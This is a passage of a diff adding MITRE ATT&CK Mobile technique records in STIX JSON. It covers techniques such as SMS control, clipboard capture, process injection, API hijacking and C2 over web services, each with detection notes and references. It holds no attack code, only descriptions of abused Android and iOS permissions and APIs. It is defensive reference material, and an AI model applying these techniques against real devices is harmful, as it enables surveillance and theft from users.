\n\nApplication vetting services can look for applications requesting the `android.permission.BIND_ACCESSIBILITY_SERVICE` permission in a service declaration. On Android, users can view and manage which applications can use accessibility services through the device settings in Accessibility. The exact device settings menu locations may vary between operating system versions.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--b1c95426-2550-4621-8028-ceebf28b3a47", + "created": "2022-04-05T19:45:03.000Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1417/001", + "external_id": "T1417.001" + }, + { + "source_name": "Zeltser-Keyboard", + "description": "Lenny Zeltser. (2016, July 30). Security of Third-Party Keyboard Apps on Mobile Devices. Retrieved December 21, 2016.", + "url": "https://zeltser.com/third-party-keyboards-security/" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/authentication-threats/AUT-13.html", + "external_id": "AUT-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:58:57.001Z", + "name": "SMS Control", + "description": "Adversaries may delete, alter, or send SMS messages without user authorization. This could be used to hide C2 SMS messages, spread malware, or various external effects.\n\nThis can be accomplished by requesting the `RECEIVE_SMS` or `SEND_SMS` permissions depending on what the malware is attempting to do. If the app is set as the default SMS handler on the device, the `SMS_DELIVER` broadcast intent can be registered, which allows the app to write to the SMS content provider. The content provider directly modifies the messaging database on the device, which could allow malicious applications with this ability to insert, modify, or delete arbitrary messages on the device.(Citation: SMS KitKat)(Citation: Android SmsProvider)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view the default SMS handler in system settings.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--b327a9c0-e709-495c-aa6e-00b042136e2b", + "created": "2020-09-11T15:14:33.730Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1582", + "external_id": "T1582" + }, + { + "source_name": "Android SmsProvider", + "description": "Google. (n.d.). SmsProvider.java. Retrieved September 11, 2020.", + "url": "https://android.googlesource.com/platform/packages/providers/TelephonyProvider/+/7e7c274/src/com/android/providers/telephony/SmsProvider.java" + }, + { + "source_name": "SMS KitKat", + "description": "S.Main, D. Braun. (2013, October 14). Getting Your SMS Apps Ready for KitKat. Retrieved September 11, 2020.", + "url": "https://android-developers.googleblog.com/2013/10/getting-your-sms-apps-ready-for-kitkat.html" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-16.html", + "external_id": "APP-16" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-41.html", + "external_id": "CEL-41" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--b332a960-3c04-495a-827f-f17a5daed3a6", + "created": "2017-10-25T14:48:14.003Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1408", + "url": "https://attack.mitre.org/techniques/T1408" + }, + { + "source_name": "Brodie", + "url": "https://media.blackhat.com/eu-13/briefings/Brodie/bh-eu-13-lacoon-attacks-mdm-brodie-wp.pdf", + "description": "Daniel Brodie. (2016). Practical Attacks against Mobile Device Management (MDM). Retrieved December 21, 2016." + }, + { + "source_name": "Rastogi", + "url": "http://pages.cs.wisc.edu/~vrastogi/static/papers/rcj13b.pdf", + "description": "Vaibhav Rastogi, Yan Chen, and Xuxian Jiang. (2013, May). DroidChameleon: Evaluating Android Anti-malware against Transformation Attacks. Retrieved December 9, 2016." + }, + { + "source_name": "Tan", + "url": "http://www.blackhat.com/us-16/briefings.html#bad-for-enterprise-attacking-byod-enterprise-mobile-security-solutions", + "description": "Vincent Tan. (2016, August). BAD FOR ENTERPRISE: ATTACKING BYOD ENTERPRISE MOBILE SECURITY SOLUTIONS. Retrieved February 4, 2017." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-5.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "EMM-5" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary could use knowledge of the techniques used by security software to evade detection(Citation: Brodie)(Citation: Tan). For example, some mobile security products perform compromised device detection by searching for particular artifacts such as an installed \"su\" binary, but that check could be evaded by naming the binary something else. Similarly, polymorphic code techniques could be used to evade signature-based detection(Citation: Rastogi).", + "modified": "2022-04-08T16:29:55.321Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Disguise Root/Jailbreak Indicators", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--b3c2e5de-0941-4b57-ba61-af029eb5517a", + "created": "2017-10-25T14:48:27.307Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1438", + "url": "https://attack.mitre.org/techniques/T1438" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-30" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a standard Internet connection, the exfiltration may occur, for example, via Bluetooth, or another radio frequency (RF) channel. \n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network. ", + "modified": "2022-04-18T19:46:02.529Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Other Network Medium", + "x_mitre_detection": "Exfiltration over other network mediums can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--b765efd1-02e6-4e67-aebf-0fef5c37e54b", + "type": "attack-pattern", + "created": "2017-10-25T14:48:26.473Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1440", + "external_id": "T1440" + } + ], + "modified": "2018-10-17T01:05:10.700Z", + "name": "Detect App Analysis Environment", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-20T18:55:54.442Z", + "name": "Process Injection", + "description": "Adversaries may inject code into processes in order to evade process-based defenses or even elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nBoth Android and iOS have no legitimate way to achieve process injection. The only way this is possible is by abusing existing root access or exploiting a vulnerability.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for misuse of dynamic libraries.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--b7c0e45f-0206-4f75-96e7-fe7edad3aaff", + "created": "2022-03-30T18:50:43.393Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1631", + "external_id": "T1631" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--b928b94a-4966-4e2a-9e61-36505b896ebc", + "type": "attack-pattern", + "created": "2017-10-25T14:48:24.905Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1462", + "external_id": "T1462" + } + ], + "modified": "2018-10-17T01:05:10.704Z", + "name": "Malicious Software Development Tools", + "x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--bb4387ab-7a51-468b-bf5f-a9a8612f0303", + "created": "2022-04-05T20:14:17.310Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1521.001", + "url": "https://attack.mitre.org/techniques/T1521/001" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may employ a known symmetric encryption algorithm to conceal command and control traffic, rather than relying on any inherent protections provided by a communication protocol. Symmetric encryption algorithms use the same key for plaintext encryption and ciphertext decryption. Common symmetric encryption algorithms include AES, Blowfish, and RC4.", + "modified": "2022-04-05T20:14:17.310Z", + "name": "Symmetric Cryptography", + "x_mitre_detection": "Since data encryption is a common practice in many legitimate applications and uses standard programming language-specific APIs, encrypting data for command and control communication is regarded as undetectable to the user.", + "kill_chain_phases": [ + { + "phase_name": "command-and-control", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--bd4d32f5-eed4-4018-a649-40b229dd1d69", + "created": "2017-10-25T14:48:30.127Z", + "x_mitre_version": "2.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1402", + "url": "https://attack.mitre.org/techniques/T1402" + }, + { + "source_name": "Android Changes to System Broadcasts", + "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts", + "description": "Google. (2019, December 27). Broadcasts Overview. Retrieved January 27, 2020." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An intent is a message passed between Android application or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received.\n\nFurther, malicious applications can register for intents broadcasted by other applications in addition to the Android system itself. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications.\n\nIn Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts)", + "modified": "2022-03-30T14:43:46.019Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Broadcast Receivers", + "x_mitre_detection": "Broadcast intent receivers are part of standard OS-level APIs and are therefore typically undetectable to the end user.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "execution" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:21:12.603Z", + "name": "Compromise Hardware Supply Chain", + "description": "Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "initial-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Integrity checking mechanisms can potentially detect unauthorized hardware modifications.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--c08366bb-8d11-4921-853f-f0a3b6a2a1da", + "created": "2022-03-28T19:30:15.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1474/002", + "external_id": "T1474.002" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-1.html", + "external_id": "SPC-1" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-2.html", + "external_id": "SPC-2" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-4.html", + "external_id": "SPC-4" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-5.html", + "external_id": "SPC-5" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-6.html", + "external_id": "SPC-6" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-7.html", + "external_id": "SPC-7" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-8.html", + "external_id": "SPC-8" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-13.html", + "external_id": "SPC-13" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-16.html", + "external_id": "SPC-16" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-17.html", + "external_id": "SPC-17" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/supply-chain-threats/SPC-21.html", + "external_id": "SPC-21" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T18:33:20.042Z", + "name": "Clipboard Data", + "description": "Adversaries may abuse clipboard manager APIs to obtain sensitive information copied to the device clipboard. For example, passwords being copied and pasted from a password manager application could be captured by a malicious application installed on the device.(Citation: Fahl-Clipboard) \n\n \n\nOn Android, applications can use the `ClipboardManager.OnPrimaryClipChangedListener()` API to register as a listener and monitor the clipboard for changes. However, starting in Android 10, this can only be used if the application is in the foreground, or is set as the device’s default input method editor (IME).(Citation: Github Capture Clipboard 2019)(Citation: Android 10 Privacy Changes) \n\n \n\nOn iOS, this can be accomplished by accessing the `UIPasteboard.general.string` field. However, starting in iOS 14, upon accessing the clipboard, the user will be shown a system notification if the accessed text originated in a different application. For example, if the user copies the text of an iMessage from the Messages application, the notification will read “application_name has pasted from Messages” when the text was pasted in a different application.(Citation: UIPPasteboard)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could detect usage of standard clipboard APIs.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "3.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--c4b96c0b-cb58-497a-a1c2-bb447d79d692", + "created": "2017-10-25T14:48:19.996Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1414", + "external_id": "T1414" + }, + { + "source_name": "Android 10 Privacy Changes", + "description": "Android Developers. (n.d.). Privacy changes in Android 10. Retrieved September 11, 2019.", + "url": "https://developer.android.com/about/versions/10/privacy/changes#clipboard-data" + }, + { + "source_name": "UIPPasteboard", + "description": "Apple Developer. (n.d.). UIPasteboard. Retrieved April 1, 2022.", + "url": "https://developer.apple.com/documentation/uikit/uipasteboard" + }, + { + "source_name": "Fahl-Clipboard", + "description": "Fahl, S, et al.. (2013). Hey, You, Get Off of My Clipboard. Retrieved August 27, 2019.", + "url": "http://saschafahl.de/static/paper/pwmanagers2013.pdf" + }, + { + "source_name": "Github Capture Clipboard 2019", + "description": "Pearce, G. (, January). Retrieved August 8, 2019.", + "url": "https://github.com/grepx/android-clipboard-security" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-35.html", + "external_id": "APP-35" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--c5089859-b21f-40a3-8be4-63e381b8b1c0", + "created": "2017-10-25T14:48:30.890Z", + "x_mitre_version": "1.2", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1400", + "url": "https://attack.mitre.org/techniques/T1400" + }, + { + "source_name": "Android-VerifiedBoot", + "url": "https://source.android.com/security/verifiedboot/", + "description": "Android. (n.d.). Verified Boot. Retrieved December 21, 2016." + }, + { + "source_name": "Apple-iOSSecurityGuide", + "url": "https://www.apple.com/business/docs/iOS_Security_Guide.pdf", + "description": "Apple. (2016, May). iOS Security. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-27" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "If an adversary can escalate privileges, he or she may be able to use those privileges to place malicious code in the device system partition, where it may persist after device resets and may not be easily removed by the device user.\n\nMany Android devices provide the ability to unlock the bootloader for development purposes. An unlocked bootloader may provide the ability for an adversary to modify the system partition. Even if the bootloader is locked, it may be possible for an adversary to escalate privileges and then modify the system partition.", + "modified": "2022-03-30T15:18:21.242Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Modify System Partition", + "x_mitre_detection": "Android devices with the Verified Boot capability (Citation: Android-VerifiedBoot) perform cryptographic checks of the integrity of the system partition.\n\nThe Android SafetyNet API's remote attestation capability could potentially be used to identify and respond to compromised devices.\n\nSamsung KNOX also provides a remote attestation capability on supported Samsung Android devices.\n\niOS devices will fail to boot or fail to allow device activation if unauthorized modifications are detected.(Citation: Apple-iOSSecurityGuide)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T15:55:32.497Z", + "name": "Data Manipulation", + "description": "Adversaries may insert, delete, or alter data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.\n\nThe type of modification and the impact it will have depends on the target application, process, and the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system, typically gained through a prolonged information gathering campaign, in order to have the desired impact.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services could look for use of standard APIs (e.g. the clipboard API) that could indicate data manipulation is occurring.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--c548d8c4-a0a3-4a24-bb79-2a84abbc7b36", + "created": "2022-04-06T13:34:46.021Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1641", + "external_id": "T1641" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:58:33.873Z", + "name": "SMS Messages", + "description": "Adversaries may utilize standard operating system APIs to gather SMS messages. On Android, this can be accomplished using the SMS Content Provider. iOS provides no standard API to access SMS messages. \n\nIf the device has been jailbroken or rooted, an adversary may be able to access [SMS Messages](https://attack.mitre.org/techniques/T1636/004) without the user’s knowledge or approval. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, the user can manage which applications have permission to access SMS messages through the device settings screen, revoking the permission if necessary. Application vetting services could look for `android.permission.READ_SMS` in an Android application’s manifest. Most applications do not need access to SMS messages, so extra scrutiny could be applied to those that request it. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.1", + "type": "attack-pattern", + "id": "attack-pattern--c6421411-ae61-42bb-9098-73fddb315002", + "created": "2022-04-01T13:25:30.923Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1636/004", + "external_id": "T1636.004" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html", + "external_id": "APP-13" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:37:13.730Z", + "name": "Web Service", + "description": "Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media, acting as a mechanism for C2, may give a significant amount of cover. This is due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection. \n\n \n\nUse of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis, or enable operational resiliency (since this infrastructure may be dynamically changed). \n\n ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services may provide a list of connections made or received by an application, or a list of domains contacted by the application.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--c6a146ae-9c63-4606-97ff-e261e76e8380", + "created": "2019-02-01T17:29:43.503Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1481", + "external_id": "T1481" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:46:08.412Z", + "name": "System Runtime API Hijacking", + "description": "Adversaries may execute their own malicious payloads by hijacking the way an operating system run applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur at later points in time. \n\n\nOn Android, adversaries may overwrite the standard OS API library with a malicious alternative to hook into core functions to achieve persistence. By doing this, the adversary’s code will be executed every time the overwritten API function is called by an app on the infected device.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile threat defense agents could detect unauthorized operating system modifications by using attestation. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--c6e17ca2-08b5-4379-9786-89bd05241831", + "created": "2022-03-30T15:07:51.646Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1625/001", + "external_id": "T1625.001" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html", + "external_id": "APP-27" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--c91c304a-975d-4501-9789-0db1c57afd3f", + "type": "attack-pattern", + "created": "2017-10-25T14:48:07.149Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1455", + "external_id": "T1455" + } + ], + "modified": "2018-10-17T01:05:10.702Z", + "name": "Exploit Baseband Vulnerability", + "x_mitre_version": "1.0", + 